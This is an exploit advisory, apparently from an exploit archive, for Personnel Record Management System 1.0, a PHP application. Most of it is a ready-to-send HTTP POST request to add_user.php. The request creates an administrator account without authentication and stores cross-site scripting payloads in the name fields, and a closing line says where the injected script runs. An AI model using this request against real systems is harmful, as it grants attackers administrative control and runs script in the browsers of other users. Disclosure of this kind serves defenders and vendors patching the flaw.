id: 36486
date: 06/28/2021
title: Personnel Record Management System 1.0 Authentication Bypass / XSS Vulnerabilities
author: Richard Jones
cves: 

# Exploit Title: Personnel Record Management System | Unauthenticated Add Admin Account (plus Stored XSS)
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/5107/record-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=5107&title=Record+Management+System+in+PHP+Free+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

#Exploit:
-------------------------------------------------------------------------------------------------
POST /Personnel_record_management_system/add_user.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Personnel_record_management_system/add_user.php
Cookie: PHPSESSID=8bkj7jlpmlbuqtnti8urp7qcmo
Upgrade-Insecure-Requests: 1

username=admin2&password=admin2&firstname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=%3Cscript%3Ealert%282%29%3C%2Fscript%3E&type=Admin&save=
-------------------------------------------------------------------------------------------------

This will add a new admin account unauthenticated with stored Cross-Site-Scripting. 

XSS can be accessed in history log, Admin account, user account pages

#  0day.today [2023-03-24]  #